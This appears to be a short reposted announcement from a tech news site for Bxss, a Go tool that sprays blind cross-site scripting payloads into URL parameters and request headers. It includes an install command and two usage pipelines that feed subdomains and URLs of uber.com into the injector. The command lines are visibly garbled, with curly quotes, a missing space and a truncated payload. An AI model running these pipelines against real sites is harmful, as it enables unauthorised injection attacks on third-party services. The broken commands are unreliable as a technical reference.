Bxss: Blind XSS Injector Finder

Bxss is a go script written to help us discover Blind XSS Injector security vulnerabilities.


Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain of tools
Really very fast
Easy to install


$ go get -u github.com/ethicalhackingplayground/bxss


Blind XSS In Parameters

$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”

Application snapshots


You can download the program from here.

Registration in iGuRu.gr via Email

Enter your email to subscribe to the email notification service for new posts.

Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News iGuRu.gr at Google news